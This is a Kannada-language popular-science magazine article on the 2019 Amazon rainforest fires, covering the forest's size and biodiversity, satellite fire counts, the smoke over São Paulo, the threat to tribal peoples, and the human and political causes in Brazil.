ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿಗೆ ಅಗ್ನಿಪರೀಕ್ಷೆ

ಭೂ ಇತಿಹಾಸದಲ್ಲಿ 560 ಲಕ್ಷ ಮತ್ತು 340 ಲಕ್ಷ ವರ್ಷಗಳ ನಡುವಿನ ಅವಧಿಯಲ್ಲಿ ಹುಟ್ಟಿದೆ ಅಮೆಜಾನ್ ಕಾಡು. ಹಿಮಯುಗವನ್ನು ಎದುರಿಸಿ ಎದ್ದು ನಿಂತ ಕಾಡಂತೆ ಇದು. ನಮ್ಮ ಭೂಮಿಯ ಮೇಲಿನ ಶೇ.20 ಭಾಗ ಆಕ್ಸಿಜನ್‍ಗೆ  ಅಮೆಜಾನ್ ಕಾಡಿನ ಕೊಡುಗೆ ಇದೆ ಎಂದರೆ ಅದು ಉತ್ಪ್ರೇಕ್ಷೆಯಲ್ಲ. ಆ ಲೆಕ್ಕದಲ್ಲಿ ಭೂಮಿಯ ಇಡೀ ಜೀವಿ ಸಂಕುಲವೇ ಅಮೆಜಾನ್ಕಾಡಿಗೆ ಋಣಿ. ಅದಕ್ಕೇ ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿಗೆ `ಭೂಮಿಯ ಶ್ವಾಸಕೋಶ’ ಎಂಬ ಬಿರುದು. ಇದೇ ಕಾರಣಕ್ಕೆ, ಅಲ್ಲಿ ಬೆಂಕಿಬಿದ್ದರೆ ಜಗತ್ತೇ ಬೆಚ್ಚಿಬೀಳುತ್ತದೆ.

ಅಮೆಜಾನ್ ಕಾಡಿಗೆ ತಗುಲಿದ ಬೆಂಕಿಯ ಕಾರಣ, ರಾಜಕಾರಣ, ಜಾಗತಿಕ ಪರಿಣಾಮಗಳನ್ನು ಕುರಿತು ಕನ್ನಡದ ಬಹುಮುಖ್ಯ ವಿಜ್ಞಾನ ಲೇಖಕ ಟಿ.ಆರ್.ಅನಂತರಾಮು ಬೆಳಕು ಚೆಲ್ಲಿದ್ದಾರೆ.

ಬಾಕ್ಸ್ + ಫೋಟೊ ಪುಟ 65
ಲೇಖಕರು ಭೂವಿಜ್ಞಾನಿಗಳು,

ಸಂಶೋಧಕರು, ಸಂಕೀರ್ಣ ವಿಜ್ಞಾನವನ್ನು ಕಸ್ತೂರಿಕನ್ನಡದಲ್ಲಿ ನಿರೂಪಿಸಬಲ್ಲರು. ತುಮಕೂರು ಜಿಲ್ಲೆಯ ತಾಳಗುಂದ ಹುಟ್ಟೂರು.

ಒಮ್ಮೆ ನಿಮ್ಮ ಶಾಲಾ ದಿನಗಳನ್ನು ನೆನಪಿಸಿಕೊಳ್ಳಿ. ಎಷ್ಟೊಂದು ನದಿಗಳ ಹೆಸರುಗಳನ್ನು ಆಗಲೇ ಕೇಳಿರುತ್ತೀರಿ. ಅಮೆಜಾನ್ ನದಿಯೆಂದರೆ ಅದು ಗಂಡುಬೀರಿ ನದಿ, ಬ್ರಹ್ಮಪುತ್ರ ಎಂದರೆ ಗಂಡುನದಿ, ಹಳದಿ ನದಿ ಎಂದರೆ ಚೀನಾದ ಶೋಕ ನದಿ, ನೈಲ್ ಎಂದರೆ ಜಗತ್ತಿನ ಅತಿ ಉದ್ದ ನದಿ ಈಜಿಪ್ಟಿನ ವರಪ್ರಸಾದ, ಹಾಗೆಯೇ ಮಳೆಕಾಡು ಎಂದರೆ ಅಮೆಜಾನ್ ಮಳೆಕಾಡಲ್ಲದೆ ಬೇರೇನೂ ಅಲ್ಲ. ಇವನ್ನು ಉರು ಹಚ್ಚಿರುತ್ತೇವೆ ಅಲ್ಲವೆ? ಅದೇನೂ ತಪ್ಪಲ್ಲ. ಮುಂದೆ ಬೆಳೆದ ಹಾಗೆ ನಮ್ಮ ಆಲೋಚನಾ ಕ್ರಮ ಕೂಡ ವಿಸ್ತರಿಸುತ್ತದೆ. ಮಳೆಕಾಡೆಂದರೆ ಅದು ಈಗ ಕೊಡುವ ಚಿತ್ರಣವೇ ಬೇರೆ. ಅತಿ ವೇಗದಲ್ಲಿ ಅಮೆಜಾನ್ ಕಾಡು ನಾಶವಾಗುತ್ತಿದೆ ಎಂಬ ವಾಸ್ತವತೆ ನಮ್ಮನ್ನು ತಟ್ಟುತ್ತದೆ.

ಈಗ ಅಮೆಜಾನ್ ಎಂದರೆ ಅದು ಮಳೆಕಾಡೂ ಅಲ್ಲ, ಗಂಡುಬೀರಿ ನದಿಯೂ ಅಲ್ಲ. ಅಮೆಜಾನ್ ಎಂದರೆ ಸಾಕು, ಅದು ಅಮೆರಿಕದ ಬಲು ದೊಡ್ಡ ಬಹುರಾಷ್ಟ್ರೀಯ ಕಂಪನಿ. ಆನ್ ಲೈನ್ ವ್ಯಾಪಾರಕ್ಕೆ ಹೆಸರುವಾಸಿ. ಗೊಂಬೆಯಿಂದ ಹಿಡಿದು ಆಲ್ಬಮ್‍ವರೆಗೆ, ಬೂಟ್ಸ್‍ನಿಂದ ಹಿಡಿದು ಬಟ್ಟೆಯವರೆಗೆ, ಕಂಪ್ಯೂಟರ್‍ನಿಂದ ಹಿಡಿದು ಪುಸ್ತಕದವರೆಗೆ ಏನು ಬೇಕು, ಎಲ್ಲವೂ ನಿಮ್ಮ ಮನೆ ಬಾಗಿಲಿಗೇ ತಲುಪಿಸುವ ಮಾಯಾ ಬಜಾರ್ ಅದು. ಅಮೆಜಾನ್ ನದಿ ದಕ್ಷಿಣ ಅಮೆರಿಕಕ್ಕೆ ಸೀಮಿತವಾದ್ದು. ಆದರೆ ಅಮೆಜಾನ್ ಕಂಪನಿ ಜಗತ್ತಿನ ಉದ್ದಗಲಕ್ಕೂ ಕೈಚಾಚಿದೆ.

ಇತ್ತೀಚೆಗೆ ನನಗಾದ ಒಂದು ಸಣ್ಣ ಅನುಭವ ಹೇಳಿ ಮುಂದಕ್ಕೆ ಹೋಗೋಣ. ಈ ಆಗಸ್ಟ್ ತಿಂಗಳ ಎರಡನೇ ವಾರ ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿಗೆ ಬೆಂಕಿಬಿದ್ದು ಜಾಗತಿಕ ಮಟ್ಟದಲ್ಲಿ ಸುದ್ದಿಯಾಯಿತು. ಅದು ಬೆಚ್ಚಿಬೀಳುವ ಸನ್ನೀವೇಶ. ಕಾಡಿಗೆ ಬೆಂಕಿಬಿದ್ದ ಚಿತ್ರಗಳು ಇಂಟರ್‍ನೆಟ್‍ನಲ್ಲಿ ನೂರಾರು ಬರುತ್ತಿದ್ದವು. ಇದರ ಜೊತೆಗೆ ಅಮೆಜಾನ್ ಫೈರ್-2019 ಎಂಬ ಟ್ಯಾಬ್ಲೆಟ್ಟಿನ ಹೊಸ ಆವೃತ್ತಿಯನ್ನು ಆ ಕಂಪನಿ ಮಾರುಕಟ್ಟೆಗೆ ಬಿಟ್ಟಿತ್ತು. ಕುತೂಹಲಗೊಂಡು ಅಮೆಜಾನ್ ಕಾಡಿನ ಬೆಂಕಿಯ ಚಿತ್ರದ ಪಕ್ಕದಲ್ಲಿ ಅಮೆಜಾನ್  ಫೈರ್ 2019ರ ಚಿತ್ರವಿಟ್ಟು ಫೇಸ್‍ಬುಕ್‍ನಲ್ಲಿ ಅಪ್‍ಲೋಡ್ ಮಾಡಿದೆ. ಅನುಮಾನವಾಯಿತು, ಹಂಚಿಕೊಳ್ಳಬಾರದೆಂದು ತೀರ್ಮಾನಿಸಿ ಡಿಲೀಟ್ ಮಾಡಿಬಿಟ್ಟೆ.

ನನಗಿದ್ದ ಭಯವೆಂದರೆ ಒಂದುವೇಳೆ ಆ ಕಂಪನಿ ನನ್ನ ಮೇಲೆ ದಾವಾ ಹೂಡಿದರೆ? ಕೆಲವೇ ನಿಮಿಷಗಳಾಗಿರಬಹುದು, ನನಗೊಂದು ಸಂದೇಶ ಬಂತು: `ನೀವು ಒಂದು ಸಮುದಾಯವನ್ನು ಅವಹೇಳನ ಮಾಡಿದ್ದೀರಿ. ಈ ಎಚ್ಚರಿಕೆಯನ್ನು ಸದ್ಯ ನೀವು ಮಾತ್ರ ಓದಬಹುದು’ ಎಂದಿತ್ತು. ನಿರಾಳ ಉಸಿರುಬಿಟ್ಟೆ. ಈಗ ಅಮೆಜಾನ್ ಎನ್ನುವ ಪದ ವಿಶ್ವವಿಖ್ಯಾತವಾದರೂ ಅದನ್ನು ಬಳಸುವಾಗ ಎಂಥ ಎಚ್ಚರಿಕೆ ಬೇಕು ಎಂದು ಸ್ವಗತವಾಡಿದೆ.

ಬ್ರೆಜಿಲ್ ಭಾಗದ ಮಳೆಕಾಡು ಬೆಂಕಿ ಬಿದ್ದು ಉರಿದ ಕಾಡು ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿನ ವ್ಯಾಪ್ತಿ

ಕಳೆದ ಆಗಸ್ಟ್ ತಿಂಗಳ 10ನೇ ತಾರೀಖಿನ ನಂತರವಷ್ಟೇ ಜಗತ್ತಿಗೆ ತಿಳಿದ ಸಂಗತಿ ಬ್ರೆಜಿಲ್ ಮಳೆಕಾಡಿಗೆ ಬೆಂಕಿಬಿದ್ದಿದೆ ಎಂದು. ಅದು ಅಂತಾರಾಷ್ಟ್ರೀಯ ಸುದ್ದಿಯಾಯಿತು, ಆಗಬೇಕಾದ್ದೇ. ನಮ್ಮ ಬಂಡಿಪುರ ಕಾಡಿಗೆ ಬೆಂಕಿಬಿದ್ದಾಗಲೆಲ್ಲ ಅದು ಸ್ಥಳೀಯ ಸುದ್ದಿಯಾಗುತ್ತದೆ. ಆದರೆ ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿಗೆ ಬೆಂಕಿಬಿದ್ದರೆ ದೊಡ್ಡ ಸುದ್ದಿಯಾಗದಿದ್ದೀತೆ?

ಅದು ಜಗತ್ತಿನ ಅತಿ ದೊಡ್ಡ ಮಳೆಕಾಡು. ದಕ್ಷಿಣ ಅಮೆರಿಕದ ಬ್ರೆಜಿಲ್, ಪೆರು, ಕೊಲಂಬಿಯ,ವೆನಿಜುಲಾ, ಈಕ್ವೆಡಾರ್, ಬೊಲಿವಿಯ, ಸುರಿನಾಮ್, ಫ್ರೆಂಚ್ ಗಯಾನ ಮತ್ತು ಗಯಾನಗಳ ನಡುವೆ ಹಂಚಿಹೋಗಿದೆ. ಸುರಿನಾಮ್ ಎಂಬುದು ಬಹುತೇಕ ಹೆಚ್ಚು ಜನರು ಕೇಳಿರದ ದೇಶ. ಗಯಾನ ಮತ್ತು ಫ್ರೆಂಚ ಗಯಾನ ನಡುವೆ ಇರುವ ಪುಟ್ಟ ದೇಶ, ಕರ್ನಾಟಕಕ್ಕಿಂತ ಚಿಕ್ಕದು. ಇದು ನಮ್ಮದು ಎಂದು ಈ ಎಲ್ಲ ದೇಶಗಳೂ ಹೇಳಬಹುದು, ಹಕ್ಕು ಚಲಾಯಿಸಬಹುದು. ನಮ್ಮ ಹಿಮಾಲಯ ಪರ್ವತಶ್ರೇಣಿಯನ್ನು ಭಾರತ, ಭೂತಾನ್, ಚೈನಾ, ನೇಪಾಳ, ಪಾಕಿಸ್ತಾನಗಳು ತಮ್ಮ ಆಸ್ತಿ ಎಂದಂತೆ. ಜಗತ್ತಿನ ಎಲ್ಲ ಮಳೆಕಾಡನ್ನೂ ಒಟ್ಟಿಗೆ ಕೂಡಿಸಿದರೆ ಎಷ್ಟಾಗುತ್ತದೋ ಅಷ್ಟೇ ದೊಡ್ಡದು ಅಮೆಜಾನ್ ಮಳೆಕಾಡು.

ಈ ಪೈಕಿ ಬ್ರೆಜಿಲ್‍ಗೆ ಇದರ ಸಿಂಹಪಾಲು-ಶೇ. 60 ಭಾಗ. ಇಡೀ ಅಮೆಜಾನ್ ಜಲಾನಯನ ಪ್ರದೇಶವನ್ನು ಪರಿಗಣಿಸಿದರೆ, ಭಾರತದ ವಿಸ್ತೀರ್ಣದ ಎರಡರಷ್ಟಿದೆ. ಅದರಲ್ಲಿ ಮಳೆಕಾಡೇ ಭಾರತದ ವಿಸ್ತೀರ್ಣದ ಒಂದೂವರೆಯಷ್ಟಿದೆ-55,00,000 ಚದರ ಕಿಲೋ ಮೀಟರ್. ವೈಶಾಲ್ಯದಲ್ಲಿ ಹೇಗೋ ವೈವಿಧ್ಯದಲ್ಲೂ ಅದು ಅನನ್ಯ ಕಾಡು. ಈ ದಟ್ಟಕಾಡಿನ ಪ್ರತಿ ಮರ ಎಣಿಸುವುದು ಅಸಾಧ್ಯದ ಕೆಲಸ. ಆದ್ದರಿಂದ ಒಂದು ಚದರ ಕಿಲೋ ಮೀಟರ್‍ಗೆ ಇಷ್ಟು ಎಂದು ಅಂದಾಜು ಮಾಡುವುದೇ ಜಾಣ ಸಮೀಕ್ಷೆ-390 ಶತಕೋಟಿ ವೃಕ್ಷಗಳನ್ನು ಇದು ಸಾಕಿದೆ, ಇದರಲ್ಲಿ 40,000 ವಿವಿಧ ಬಗೆಯ ವೃಕ್ಷಗಳಿವೆ ಎನ್ನುವುದು ಒಪ್ಪಿರುವ ಲೆಕ್ಕಚಾರ.

ಭೂವಿಜ್ಞಾನಿಗಳು ಇನ್ನೂ ಒಂದು ಲೆಕ್ಕ ಹೇಳಿ ನಮ್ಮನ್ನು ದಂಗುಬಡಿಸಿದ್ದಾರೆ. ಭೂ ಇತಿಹಾಸದಲ್ಲಿ 560 ಲಕ್ಷ ಮತ್ತು 340 ಲಕ್ಷ ವರ್ಷಗಳ ನಡುವಿನ ಅವಧಿಯಲ್ಲಿ ಹುಟ್ಟಿದ ಕಾಡು. ಹಿಮಯುಗವನ್ನು ಎದುರಿಸಿ ಎದ್ದು ನಿಂತ ಕಾಡಂತೆ ಇದು. ವೃಕ್ಷ ಹೆಚ್ಚಿದಷ್ಟು ನಮಗೆ ಆಕ್ಸಿಜನ್ ಪೂರೈಕೆ ಹೆಚ್ಚು ಎನ್ನುವುದು ಎಲ್ಲರಿಗೂ ತಿಳಿದಿರುವ ಸಾಮಾನ್ಯ ಸಂಗತಿ. ನಮ್ಮ ಭೂಮಿಯ ಮೇಲಿನ ಶೇ.20 ಭಾಗ ಆಕ್ಸಿಜನ್‍ಗೆ ಅಮೆಜಾನ್ ಕಾಡಿನ ಕೊಡುಗೆ ಇದೆ ಎಂದರೆ ಅದು ಉತ್ಪ್ರೇಕ್ಷೆಯಲ್ಲ, ಆ ಲೆಕ್ಕದಲ್ಲಿ ಭೂಮಿಯ ಇಡೀ ಜೀವಿ ಸಂಕುಲವೇ ಅಮೆಜಾನ್ ಕಾಡಿಗೆ ಋಣಿ. ಅದಕ್ಕೇ ಹೆಮ್ಮೆಯಿಂದ ಜಗತ್ತು ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿಗೆ ಕೊಟ್ಟಿರುವ ಬಿರುದು: `ಭೂಮಿಯ ಶ್ವಾಸಕೋಶ’. ಇದೇ ಕಾರಣಕ್ಕೆ, ಅಲ್ಲಿ ಬೆಂಕಿಬಿದ್ದಾಗ ಜಗತ್ತೇ ಬೆಚ್ಚಿತ್ತು, ಕಳವಳಗೊಂಡಿತ್ತು.

ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿನ ಅಮೆಜಾನ್ ನದಿಯ ಬಾಗು-ಬಳುಕು

ಆದದ್ದೆಲ್ಲ ಕೆಡುಕೇ ಆಯಿತು

ಬ್ರೆಜಿಲ್ ಈ ಮಳೆಕಾಡನ್ನು ಮೊದಲಿನಿಂದಲೂ ಜತನವಾಗಿ ನೋಡಿಕೊಂಡಿದೆ. ಈಗ ಉಪಗ್ರಹಗಳ ಸಮೀಕ್ಷೆಯೂ ಸುಲಭ. ಎಲ್ಲಿ, ಎಷ್ಟು ಪ್ರಮಾಣ ಕಾಡು ನಷ್ಟ ಎಂದು ಕಣ್ಣೆದುರಿಗಿನ ಚಿತ್ರಗಳೇ ತೋರಿಸಿಕೊಡುತ್ತವೆ. ಬ್ರೆಜಿಲ್‍ನ `ನ್ಯಾಷನಲ್ ಇನ್‍ಸ್ಟಿಟ್ಯೂಟ್ ಆಫ್ ಸ್ಪೇಸ್ ರಿಸರ್ಚ್’ ಈ ವರ್ಷದ ಜೂನ್ ಮತ್ತು ಜುಲೈ ತಿಂಗಳುಗಳಲ್ಲಿ ಅಮೆಜಾನ್ ಕಾಡಿನ ಕೆಲವು ಭಾಗಗಳಲ್ಲಿ ಬೆಂಕಿ ಕಾಣಿಸಿಕೊಂಡಿದೆ ಎಂದು ಉಪಗ್ರಹ ಚಿತ್ರಗಳನ್ನು ಆಧರಿಸಿ ವರದಿಮಾಡಿತ್ತು. ಆದರೆ ಪಾಲಾನುಭವಿಗಳಾದ ಒಂಬತ್ತು ದೇಶಗಳು ಇದನ್ನು ಗಂಭೀರವಾಗಿ ಪರಿಗಣಿಸಲಿಲ್ಲ. ಆಗಸ್ಟ್ ಎರಡನೇ ವಾರದ ಹೊತ್ತಿಗೆ ಬ್ರೆಜಿಲ್‍ಗೆ ಸೇರಿದ ಮಳೆಕಾಡಿನಲ್ಲಿ 40,000 ಬೆಂಕಿ ಪ್ರಕರಣಗಳು ಗಮನಕ್ಕೆ ಬಂದವು. ಬೆಂಕಿಗೆ ಭೂಗೋಳದ ಮುಲಾಜೇನು? ಬೊಲಿವಿಯ, ಪೆರು, ಪೆರುಗ್ವೆ ಭಾಗಕ್ಕೂ ಹಬ್ಬಿತು. ಈಗ ನಾಸಾ ಸಂಸ್ಥೆ ಬ್ರೆಜಿಲ್‍ನ ಸಂಸ್ಥೆಯೊಂದಿಗೆ ಜೊತೆಗೂಡಿ ಮಾಡಿದ ಅಧ್ಯಯನ ಇನ್ನಷ್ಟು ಬೆಚ್ಚಿಬೀಳಿಸಿತು. 2019ರ ಒಂದೇ ವರ್ಷದಲ್ಲಿ ಅಂದರೆ ಆಗಸ್ಟ್ ತಿಂಗಳ ಹೊತ್ತಿಗೆ ಬರೀ ಬ್ರೆಜಿಲ್ ಒಂದರಲ್ಲೇ 80,000 ಬೆಂಕಿ ಪ್ರಕರಣಗಳು ಲೆಕ್ಕಕ್ಕೆ ಸಿಕ್ಕವು.

ಲೇಖಕರು ಭೂವಿಜ್ಞಾನಿ,
ಸಂಶೋಧಕರು, ಸಂಕೀರ್ಣ ವಿಜ್ಞಾನವನ್ನು
ಕಸ್ತೂರಿ ಕನ್ನಡದಲ್ಲಿ
ನಿರೂಪಿಸಬಲ್ಲರು.
ತುಮಕೂರು ಜಿಲ್ಲೆಯ
ತಾಳಗುಂದ ಹುಟ್ಟೂರು

ಭೂಮಿಯ ಮೇಲೆ ಸುಮಾರು 400 ಕಿಲೋ ಮೀಟರ್ ಎತ್ತರದಲ್ಲಿ ಸೆಕೆಂಡಿಗೆ 7.6 ಕಿಲೋ ಮೀಟರ್ ವೇಗದಲ್ಲಿ ಈಗಲೂ ಸಾಗುತ್ತಿರುವ ಅಂತಾರಾಷ್ಟ್ರೀಯ ಅಂತರಿಕ್ಷ ನಿಲ್ದಾಣದ (ಐ.ಎಸ್.ಎಸ್.) ಗಗನಯಾನಿಗಳು ಈ ಬೆಂಕಿಯನ್ನು ಆ ಎತ್ತರದಲ್ಲೇ ಗಮನಿಸಿದ್ದರು. ಅಮೆಜಾನ್ ಕಾಡಿನ ಮೇಲೆ ವಿಚಿತ್ರ ಮೋಡಗಳು ತೇಲುತ್ತಿವೆ ಹಾಗೆಯೇ ಹಬ್ಬುತ್ತಿವೆ ಎಂದು ವರದಿ ಮಾಡಿದರು. ವಾಸ್ತವವಾಗಿ ಆ ಮೋಡಗಳೆಂದರೆ ಹೊಗೆ ಮೋಡಗಳು. ಈ ಹೊತ್ತಿಗೆ ಎಲ್ಲ ಸಾಮಾಜಿಕ ಮಾಧ್ಯಮಗಳೂ ಚುರುಕಾಗಿ ಇದೊಂದು ಜಾಗತಿಕ ದುರಂತ ಎಂದು `ನಿಜ ಸುದ್ದಿ’ ಯನ್ನೇ ಬಿತ್ತರಿಸಿದ್ದವು. ಜಗತ್ತಿನ ನಾಯಕರು ಎಚ್ಚೆತ್ತರು. ಅವು ಆತಂಕದ ಕ್ಷಣಗಳು. ಏಕೆಂದರೆ ಭೂಮಿಯ ಶ್ವಾಸಕೋಶಕ್ಕೇ ಬಿದ್ದ ಬೆಂಕಿ ಅದು. ಜಗತ್ತಿನ ಬಹು ದೊಡ್ಡ ಮಳೆಕಾಡು ಬೆಂಕಿಗೆ ಆಹುತಿಯಾಗಿದೆ ಎಂದರೆ ಅದರ ಪರಿಣಾಮ ಬಲು ಘೋರ. ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿನ ಅಪರೂಪದ ಜೀವಿಸಂಕುಲ, ಸಸ್ಯಸಂಕುಲ ಅಷ್ಟೇ ಅಲ್ಲ, ಸ್ಥಳೀಯ ಬುಡಕಟ್ಟು ಜನರ ಬದುಕಿಗೆ ಸಂಚಕಾರ. ಮಳೆಕಾಡಿನಲ್ಲಿ 300 ಲಕ್ಷ ಜನ ವಾಸಿಸುತ್ತಿದ್ದಾರೆ, ಈ ಪೈಕಿ 400 ಬುಡಕಟ್ಟುಗಳಿಗೆ ಸೇರಿದ 10 ಲಕ್ಷ ಜನ ದಟ್ಟಕಾಡನ್ನೇ ನೆಚ್ಚಿಕೊಂಡಿದ್ದಾರೆ.

ನಾಸಾ ಸಂಸ್ಥೆಯ ಉಪಗ್ರಹ ಛಾಯಾ ಚಿತ್ರಗಳಲ್ಲಿ ಕಂಡ ಬೆಂಕಿ ಮಾಟ್ಸೆ ಬುಡಕಟ್ಟು – ಬ್ರೆಜಿಲ್ – ಪೆರು ಗಡಿಭಾಘದ ಕಾಡಿನಲ್ಲಿ ಹುನಿ -ಕುಯಿ ಬುಡಕಟ್ಟು

ಟ್ಟಿಟರ್ ಜಾಗೃತವಾಯಿತು, #ActForTheAmazon, #PrayForAmazonas, ಹ್ಯಾಷ್ ಟ್ಯಾಗ್‍ನಲ್ಲಿ ಈ ದುರಂತದ ಸಂದೇಶಗಳು ಕ್ಷಣಾರ್ಧದಲ್ಲಿ ಜಗತ್ತಿನ ತುಂಬ ಹರಿದಾಡಿದವು. ವಾಸ್ತವವಾಗಿ ಅವು ಹಂಚಿಕೊಂಡ ಎಷ್ಟೋ ಚಿತ್ರಗಳು ಯಾವುದೋ ಕಾಲದಲ್ಲಿ ಬಿದ್ದ ಬೆಂಕಿಯ ಚಿತ್ರಗಳು. ಆದರೇನಂತೆ ಈ ಬೀಭತ್ಸ ನೋಟ ಜಗತ್ತಿಗೆ ತಟ್ಟಿತು. ಆಗಸ್ಟ್ ತಿಂಗಳ 19ರ ಹೊತ್ತಿಗೆ ಅಮೆಜಾನ್ ಕಾಡು ಬೆಂಕಿಯಿಂದ ಸುಟ್ಟಾಗ ಕಾರ್ಬನ್ ಮಾನಾಕ್ಸೈಡ್ ಎಂಬ ವಿಷಕಾರಿ ಅನಿಲ ವಾಯುಗೋಳಕ್ಕೆ ತೂರಿ ಗಾಳಿಯಲ್ಲಿ ತೇಲುತ್ತ 2700 ಕಿಲೋ ಮೀಟರ್ ದೂರದಲ್ಲಿದ್ದ ಸಾವೊ ಪೌಲೋ ನಗರವನ್ನು ಮುತ್ತಿಗೆ ಹಾಕಿತ್ತು. ಜನ ಉಸಿರಾಡಲೂ ಹೆಣಗಾಡುವಂತಾಯಿತು. ಮಧ್ಯಾಹ್ನವೇ ಬೀದಿ ದೀಪ ಹಾಕುವಷ್ಟು ಕತ್ತಲಾಗಿತ್ತು.

ಸಾವೊ ಪೌಲೋ ನಗರ ಆಗ್ನೇಯ ಬ್ರೆಜಿಲ್‍ನ ಆರ್ಥಿಕ ಚಟುವಟಿಕೆಯ ಕೇಂದ್ರ. ಅಮೆಜಾನ್ ಮಳೆಕಾಡು ಬೆಂಕಿಗೆ ಒಡ್ಡಿಕೊಂಡ ಪ್ರಸಂಗ ಇದೇನೂ ಮೊದಲಲ್ಲ. ಇದರ ಎಲ್ಲ ಲೆಕ್ಕವೂ ಬ್ರೆಜಿಲ್ ಬಳಿ ಇದೆ. 2005ರಲ್ಲಿ ಕೇವಲ ಎಂಟು ತಿಂಗಳಲ್ಲಿ 1,42,000 ಬಾರಿ ಬೆಂಕಿ ಕಾಣಿಸಿತ್ತು. ಪ್ರತಿವರ್ಷವೂ ಈ ಮಳೆಕಾಡಿಗೆ ಅಗ್ನಿಪರೀಕ್ಷೆಯೇ. ಆದರೆ ಎಲ್ಲ ಬಾರಿಯೂ ಗೆದ್ದು ಬಂದಿದೆ ಎಂದು ಹೇಳಲಾಗದು. ಏಕೆಂದರೆ ಬೆಂಕಿ ಬಿದ್ದಾಗಲೆಲ್ಲ ಎಷ್ಟು ವೃಕ್ಷಗಳು ಬಲಿಯಾಗಿವೆ, ಎಷ್ಟು ಜೀವಿಗಳು ಕರಕಲಾಗಿವೆ ಎಂಬ ನಿಖರ ಲೆಕ್ಕ ಎಂದೂ ಸಿಕ್ಕುವುದಿಲ್ಲ. ಅಸಲಿ ಪ್ರಶ್ನೆ ಎಂದರೆ ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿಗೆ ಬೆಂಕಿ ಏಕೆ ಬೀಳುತ್ತದೆ? ಇದರಲ್ಲಿ ಪ್ರಕೃತಿಯ ಕೈವಾಡವೆಷ್ಟು? ಮನುಷ್ಯನ ಕೃತ್ಯ ಎಷ್ಟು?

ಸಾವೊ ಪೌಲೋ – ಹಗಲಲ್ಲೆ ಬೀದಿ ದೀಪ ಬ್ರೆಜಿಲ್ ಕಾಡಿನಲ್ಲಿ ಎದ್ದ ಹೊಗೆ

ಇದು ದಕ್ಷಿಣ ಅಮೆರಿಕಕ್ಕೆ ಹೊರತಾದ ದೇಶಗಳು ಲಾಗಾಯ್ತಿನಿಂದ ಚರ್ಚಿಸುತ್ತಿರುವ ವಿಚಾರ. ಜಗತ್ತಿನಲ್ಲಿ ಬೇರೆಡೆಯಲ್ಲೂ ಉಷ್ಣವಲಯದ ಕಾಡುಗಳಿವೆ. ಇಲ್ಲೂ ಶುಷ್ಕ ಋತುಗಳಲ್ಲಿ ಅಂದರೆ ಜುಲೈನಿಂದ ಅಕ್ಟೋಬರ್‍ವರೆಗೆ ಬೆಂಕಿ ಯಾವಾಗಲಾದರೂ ಕಾಣಿಸಿಕೊಳ್ಳಬಹುದು. ಹೆಚ್ಚಿನ ಪಾಲು ಮಿಂಚಿನ ಹೊಡೆತವೇ ಒಣಗಿದ ಹುಲ್ಲಿಗೆ ಹೊಡೆದು ಹುಲ್ಲು ಹೊತ್ತಿಕೊಂಡು ಉರಿಯುತ್ತ, ಅನಂತರ ಅದು ಶಮನವಾಗುತ್ತದೆ. ಇದಕ್ಕೆ ಅಲ್ಲಿನ ಜೀವಿಗಳೂ ಹೊಂದಿಕೊಂಡೇ ವಿಕಾಸವಾಗಿವೆ.

ಕಳೆದ ಎರಡು ದಶಕಗಳಿಂದ ಬೆಂಕಿ ಪ್ರಕರಣ ಇಡೀ ಅಮೆಜಾನ್ನ ಹೃದಯ ಭಾಗವನ್ನು ದಹಿಸಿತ್ತಿರುವುದಕ್ಕೆ ಯಾವುದೇ ಸಾಕ್ಷಿ ಬೇಕಾಗಿಲ್ಲ, ಕರಕಲಾಗಿರುವ ಕಾಡೇ ಸಾಕ್ಷಿ. ಈ ಕೃತ್ಯಕ್ಕೆ ಮಿಂಚನ್ನು ದೂಷಿಸಿದರೆ ಅದು ಅಪ್ರಬುದ್ಧ ತೀರ್ಮಾನವಾಗಬಹುದು. ನಿಸ್ಸಂಶಯವಾಗಿ ಇದು ಮನುಷ್ಯನ ಕೈವಾಡ ಎಂಬುದಕ್ಕೆ ಪುರಾವೆಗಳೇನೂ ಬೇಕಾಗುವುದಿಲ್ಲ. ಬ್ರೆಜಿಲ್ ಸರ್ಕಾರಕ್ಕೂ ಗೊತ್ತಿದೆ. ಅಪರಾಧಿ ಸ್ಥಾನದಲ್ಲಿ ನಿಲ್ಲಬೇಕಾದ್ದು ಆ ದೇಶವೇ. ಈಗಿನ ಬ್ರೆಜಿಲ್ ಅಧ್ಯಕ್ಷ ಜೈರ್ ಬೊ¯್ಸನಾರೊ ಈ ವರ್ಷದ ಜನವರಿ 1ರಂದೇ ಅಧ್ಯಕ್ಷನಾಗಿ ಹುದ್ದೆ ವಹಿಸಿಕೊಳ್ಳುವ ಮೊದಲೇ ತನ್ನ ಚುನಾವಣಾ ಪ್ರನಾಳಿಕೆಯಲ್ಲಿ ಒಂದು ಅಂಶ ಸೇರಿಸಿದ್ದ. `ಭಗವಂತನ ದಯೆಯಿಂದ ಬ್ರೆಜಿಲ್ ನೈಸರ್ಗಿಕ ಸಂಪನ್ಮೂಲದಿಂದ ತುಂಬಿತುಳುಕುತ್ತಿದೆ. ಅದನ್ನು ಯುಕ್ತವಾಗಿ ಬಳಸಿಕೊಳ್ಳದಿದ್ದರೆ ನಾವು ದಡ್ಡರಾಗುತ್ತೇವೆ. ನಮ್ಮ ಆರ್ಥಿಕತೆ ಹೀಗೆಯೇ ಇರುತ್ತದೆ, ಹಿಗ್ಗುವುದಿಲ್ಲ’ ಎಂಬ ಅಂಶ ಸೇರಿಸಿದ್ದ.

